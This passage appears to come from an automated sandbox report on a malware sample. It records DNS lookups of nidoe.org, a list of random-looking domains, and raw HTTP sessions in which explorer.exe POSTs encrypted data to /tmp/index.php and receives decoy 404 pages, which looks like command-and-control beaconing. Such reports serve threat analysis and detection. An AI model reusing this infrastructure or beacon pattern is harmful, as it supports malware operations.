Apr 26, 2024 11:50:50.670847893 CEST	80	49749	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:57.428883076 CEST	49750	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:57.656923056 CEST	80	49750	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:57.657027960 CEST	49750	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:57.657191992 CEST	49750	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:57.657213926 CEST	49750	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:57.865864038 CEST	80	49750	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:58.310956955 CEST	80	49750	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:58.311183929 CEST	49750	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:58.315697908 CEST	80	49750	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:58.315788031 CEST	49750	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:58.315973997 CEST	49750	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:58.525862932 CEST	80	49750	190.187.52.42	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 11:47:17.315043926 CEST	64761	53	192.168.2.5	1.1.1.1
Apr 26, 2024 11:47:18.324919939 CEST	64761	53	192.168.2.5	1.1.1.1
Apr 26, 2024 11:47:19.312628031 CEST	64761	53	192.168.2.5	1.1.1.1
Apr 26, 2024 11:47:20.623909950 CEST	53	64761	1.1.1.1	192.168.2.5
Apr 26, 2024 11:47:20.623934984 CEST	53	64761	1.1.1.1	192.168.2.5
Apr 26, 2024 11:47:20.623951912 CEST	53	64761	1.1.1.1	192.168.2.5
Apr 26, 2024 11:49:52.809465885 CEST	60231	53	192.168.2.5	1.1.1.1
Apr 26, 2024 11:49:53.796881914 CEST	60231	53	192.168.2.5	1.1.1.1
Apr 26, 2024 11:49:54.812223911 CEST	60231	53	192.168.2.5	1.1.1.1
Apr 26, 2024 11:49:55.923408031 CEST	53	60231	1.1.1.1	192.168.2.5
Apr 26, 2024 11:49:55.923434019 CEST	53	60231	1.1.1.1	192.168.2.5
Apr 26, 2024 11:49:55.923450947 CEST	53	60231	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 11:47:17.315043926 CEST	192.168.2.5	1.1.1.1	0x7476	Standard query (0)	nidoe.org	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:18.324919939 CEST	192.168.2.5	1.1.1.1	0x7476	Standard query (0)	nidoe.org	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:19.312628031 CEST	192.168.2.5	1.1.1.1	0x7476	Standard query (0)	nidoe.org	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:52.809465885 CEST	192.168.2.5	1.1.1.1	0x7207	Standard query (0)	nidoe.org	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:53.796881914 CEST	192.168.2.5	1.1.1.1	0x7207	Standard query (0)	nidoe.org	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:54.812223911 CEST	192.168.2.5	1.1.1.1	0x7207	Standard query (0)	nidoe.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 11:47:20.623909950 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	119.204.11.2	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623909950 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	190.147.2.86	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623909950 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	183.100.39.16	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623909950 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	122.100.154.145	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623909950 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	181.55.190.201	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623909950 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	189.57.135.154	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623909950 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	190.195.60.212	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623909950 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	85.11.159.22	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623909950 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	211.119.84.112	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623909950 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	211.181.24.132	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623934984 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	119.204.11.2	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623934984 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	190.147.2.86	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623934984 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	183.100.39.16	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623934984 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	122.100.154.145	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623934984 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	181.55.190.201	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623934984 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	189.57.135.154	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623934984 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	190.195.60.212	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623934984 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	85.11.159.22	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623934984 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	211.119.84.112	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623934984 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	211.181.24.132	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623951912 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	119.204.11.2	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623951912 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	190.147.2.86	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623951912 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	183.100.39.16	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623951912 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	122.100.154.145	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623951912 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	181.55.190.201	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623951912 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	189.57.135.154	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623951912 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	190.195.60.212	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623951912 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	85.11.159.22	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623951912 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	211.119.84.112	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:47:20.623951912 CEST	1.1.1.1	192.168.2.5	0x7476	No error (0)	nidoe.org	211.181.24.132	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923408031 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	190.187.52.42	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923408031 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	201.119.37.26	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923408031 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	190.28.78.114	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923408031 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	93.118.137.82	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923408031 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	210.182.29.70	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923408031 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	220.125.3.190	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923408031 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	190.147.2.86	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923408031 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	109.175.29.39	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923408031 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	201.103.73.225	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923408031 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	201.191.99.134	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923434019 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	190.187.52.42	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923434019 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	201.119.37.26	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923434019 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	190.28.78.114	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923434019 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	93.118.137.82	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923434019 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	210.182.29.70	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923434019 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	220.125.3.190	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923434019 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	190.147.2.86	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923434019 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	109.175.29.39	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923434019 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	201.103.73.225	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923434019 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	201.191.99.134	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923450947 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	190.187.52.42	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923450947 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	201.119.37.26	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923450947 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	190.28.78.114	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923450947 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	93.118.137.82	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923450947 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	210.182.29.70	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923450947 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	220.125.3.190	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923450947 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	190.147.2.86	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923450947 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	109.175.29.39	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923450947 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	201.103.73.225	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:49:55.923450947 CEST	1.1.1.1	192.168.2.5	0x7207	No error (0)	nidoe.org	201.191.99.134	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

tkexntmwarsh.net

nidoe.org

bxepraawugwqn.com

tjprilinnlddmg.net

dlytdgdqkjwsthka.net

dlhsbtjkcsrywy.com

guijonadpodebyqi.net

uhlohybvnslbwb.com

dnxsraqaaam.org

jritymeowitfd.org

ylocvbbjhcotul.net

lyvgfxwmddcnfb.org

qipuwsetjdsly.net

sitrlilwixmijdwa.com

lkfxkpohfrqcuf.org

ymaqoerhmbiko.org

lifcehnnpyaunk.com

bmvswhlxjuxjpf.com

chqvujyrjfo.com

jldhvcofgpoohdqq.com

dpmkxcqjquv.org

vxtsdxtdlktwbdnl.org

abowpkrstiub.net

tboygovgxqdbv.org

ovkuafudign.com

xbqpttmfpoa.net

rskpmxlavjxbjtbs.com

hphdpqnonfmpdqxq.net

qakjjulmdxb.org

jljckibghorwl.org

ypaypqoyqmujr.com

xqmcfngarfr.org

crqwqadvlmh.net

ibixnemdysifgd.net

owewxdswvpurak.org

oykcjyefevftfd.com

ybjmbdiflbije.org

uwbpryoiwnr.org

oycdwmonhjrtmcya.com

iscsxhjipsydnvm.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49711	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:47:20.949841022 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tkexntmwarsh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 255 Host: nidoe.org
Apr 26, 2024 11:47:20.949866056 CEST	255	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4f 45 c0 f0 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vuOENG_bIO9nmBY!IjC~}!&b8`iS~%DebifzFiBx(O8=HTkG0@
Apr 26, 2024 11:47:22.135804892 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:47:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 8d Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:47:22.464463949 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bxepraawugwqn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 365 Host: nidoe.org
Apr 26, 2024 11:47:22.464495897 CEST	365	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 33 15 d0 85 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA -[k,vu3yK]E3%Se(7X3(v{$<)L:?i5[UMq(j.THqui~t\c3JybW"
Apr 26, 2024 11:47:23.658689976 CEST	510	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:47:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:47:23.987965107 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tjprilinnlddmg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 157 Host: nidoe.org
Apr 26, 2024 11:47:23.987986088 CEST	157	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 25 58 ec fb Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA -[k,vu%X{*Qa^NRsO=)o\|BsPA#NG&8NYnCyUC
Apr 26, 2024 11:47:25.165426970 CEST	510	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:47:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49714	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:47:25.556178093 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dlytdgdqkjwsthka.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 148 Host: nidoe.org
Apr 26, 2024 11:47:25.557106018 CEST	148	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 50 00 ad a0 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA -[k,vuPTAIq>jlMz!hKx~[34=3Gmt*h
Apr 26, 2024 11:47:26.740653992 CEST	510	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:47:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49715	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:47:27.784658909 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dlhsbtjkcsrywy.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 287 Host: nidoe.org
Apr 26, 2024 11:47:27.784682989 CEST	287	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 23 09 d6 e2 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA -[k,vu#HRFlLae3Je{agu\'y/MV%d5[=w)5TD=B}.yA/j7Fxk6-}_"&
Apr 26, 2024 11:47:28.977370024 CEST	510	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:47:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49716	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
